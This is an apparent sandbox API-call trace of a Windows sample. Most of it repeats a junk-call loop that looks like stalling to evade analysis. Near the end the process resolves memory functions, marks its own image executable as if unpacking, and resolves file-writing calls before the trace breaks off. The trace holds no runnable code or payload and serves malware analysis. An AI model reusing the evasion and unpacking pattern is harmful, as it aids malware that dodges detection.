GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.072] AddAtomA (lpString=0x0) returned 0x0 [0112.072] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.072] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.072] AddAtomA (lpString=0x0) returned 0x0 [0112.072] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.072] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.072] AddAtomA (lpString=0x0) returned 0x0 [0112.072] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.072] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.072] AddAtomA (lpString=0x0) returned 0x0 [0112.072] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.072] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.072] AddAtomA (lpString=0x0) returned 0x0 [0112.072] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.072] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.072] AddAtomA (lpString=0x0) returned 0x0 [0112.072] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.072] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.072] AddAtomA (lpString=0x0) returned 0x0 [0112.072] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.072] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.072] AddAtomA (lpString=0x0) returned 0x0 [0112.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.073] AddAtomA (lpString=0x0) returned 0x0 [0112.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.073] AddAtomA (lpString=0x0) returned 0x0 [0112.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.073] AddAtomA (lpString=0x0) returned 0x0 [0112.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.073] AddAtomA (lpString=0x0) returned 0x0 [0112.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.073] AddAtomA (lpString=0x0) returned 0x0 [0112.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.073] AddAtomA (lpString=0x0) returned 0x0 [0112.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.073] AddAtomA (lpString=0x0) returned 0x0 [0112.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.073] AddAtomA (lpString=0x0) returned 0x0 [0112.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.074] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.074] AddAtomA (lpString=0x0) returned 0x0 [0112.074] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.074] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.074] AddAtomA (lpString=0x0) returned 0x0 [0112.074] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.074] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.074] AddAtomA (lpString=0x0) returned 0x0 [0112.074] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.074] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.074] AddAtomA (lpString=0x0) returned 0x0 [0112.074] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.074] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.074] AddAtomA (lpString=0x0) returned 0x0 [0112.074] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.074] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.074] AddAtomA (lpString=0x0) returned 0x0 [0112.074] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.074] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.074] AddAtomA (lpString=0x0) returned 0x0 [0112.074] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.074] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.074] AddAtomA (lpString=0x0) returned 0x0 [0112.074] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.076] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.076] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.076] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.076] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.076] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.076] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.076] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.076] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.076] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.077] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.077] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.077] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.271] AddAtomA (lpString=0x0) returned 0x0 [0112.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.271] AddAtomA (lpString=0x0) returned 0x0 [0112.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.271] AddAtomA (lpString=0x0) returned 0x0 [0112.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.271] AddAtomA (lpString=0x0) returned 0x0 [0112.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.271] AddAtomA (lpString=0x0) returned 0x0 [0112.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.271] AddAtomA (lpString=0x0) returned 0x0 [0112.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.271] AddAtomA (lpString=0x0) returned 0x0 [0112.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.272] AddAtomA (lpString=0x0) returned 0x0 [0112.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.272] AddAtomA (lpString=0x0) returned 0x0 [0112.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.272] AddAtomA (lpString=0x0) returned 0x0 [0112.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.272] AddAtomA (lpString=0x0) returned 0x0 [0112.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.272] AddAtomA (lpString=0x0) returned 0x0 [0112.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.272] AddAtomA (lpString=0x0) returned 0x0 [0112.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.272] AddAtomA (lpString=0x0) returned 0x0 [0112.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.272] AddAtomA (lpString=0x0) returned 0x0 [0112.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.273] AddAtomA (lpString=0x0) returned 0x0 [0112.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.273] AddAtomA (lpString=0x0) returned 0x0 [0112.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.273] AddAtomA (lpString=0x0) returned 0x0 [0112.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.273] AddAtomA (lpString=0x0) returned 0x0 [0112.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.273] AddAtomA (lpString=0x0) returned 0x0 [0112.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.273] AddAtomA (lpString=0x0) returned 0x0 [0112.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.273] AddAtomA (lpString=0x0) returned 0x0 [0112.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.273] AddAtomA (lpString=0x0) returned 0x0 [0112.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.274] AddAtomA (lpString=0x0) returned 0x0 [0112.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.274] AddAtomA (lpString=0x0) returned 0x0 [0112.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.274] AddAtomA (lpString=0x0) returned 0x0 [0112.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.274] AddAtomA (lpString=0x0) returned 0x0 [0112.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.274] AddAtomA (lpString=0x0) returned 0x0 [0112.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.274] AddAtomA (lpString=0x0) returned 0x0 [0112.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.274] AddAtomA (lpString=0x0) returned 0x0 [0112.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.275] AddAtomA (lpString=0x0) returned 0x0 [0112.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.275] AddAtomA (lpString=0x0) returned 0x0 [0112.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.275] AddAtomA (lpString=0x0) returned 0x0 [0112.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.275] AddAtomA (lpString=0x0) returned 0x0 [0112.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.275] AddAtomA (lpString=0x0) returned 0x0 [0112.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.275] AddAtomA (lpString=0x0) returned 0x0 [0112.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.275] AddAtomA (lpString=0x0) returned 0x0 [0112.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.275] AddAtomA (lpString=0x0) returned 0x0 [0112.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.276] AddAtomA (lpString=0x0) returned 0x0 [0112.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.276] AddAtomA (lpString=0x0) returned 0x0 [0112.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.276] AddAtomA (lpString=0x0) returned 0x0 [0112.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.276] AddAtomA (lpString=0x0) returned 0x0 [0112.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.276] AddAtomA (lpString=0x0) returned 0x0 [0112.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.276] AddAtomA (lpString=0x0) returned 0x0 [0112.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.276] AddAtomA (lpString=0x0) returned 0x0 [0112.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.277] AddAtomA (lpString=0x0) returned 0x0 [0112.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.277] AddAtomA (lpString=0x0) returned 0x0 [0112.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.277] AddAtomA (lpString=0x0) returned 0x0 [0112.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.277] AddAtomA (lpString=0x0) returned 0x0 [0112.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.277] AddAtomA (lpString=0x0) returned 0x0 [0112.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.277] AddAtomA (lpString=0x0) returned 0x0 [0112.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.277] AddAtomA (lpString=0x0) returned 0x0 [0112.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.277] AddAtomA (lpString=0x0) returned 0x0 [0112.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.278] AddAtomA (lpString=0x0) returned 0x0 [0112.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.278] AddAtomA (lpString=0x0) returned 0x0 [0112.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.278] AddAtomA (lpString=0x0) returned 0x0 [0112.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.278] AddAtomA (lpString=0x0) returned 0x0 [0112.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.278] AddAtomA (lpString=0x0) returned 0x0 [0112.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.278] AddAtomA (lpString=0x0) returned 0x0 [0112.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.278] AddAtomA (lpString=0x0) returned 0x0 [0112.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.603] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0112.604] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0112.604] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0112.604] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0112.604] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0112.604] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0112.604] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0112.604] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0112.604] SetErrorMode (uMode=0x400) returned 0x0 [0112.604] SetErrorMode (uMode=0x0) returned 0x400 [0112.604] GetVersionExA (in: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0112.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2d800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0112.646] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5f0 | out: lpflOldProtect=0x18f5f0*=0x2) returned 1 [0112.679] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0112.734] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0112.734] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0112.734] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0112.734] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0112.735] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0112.735] 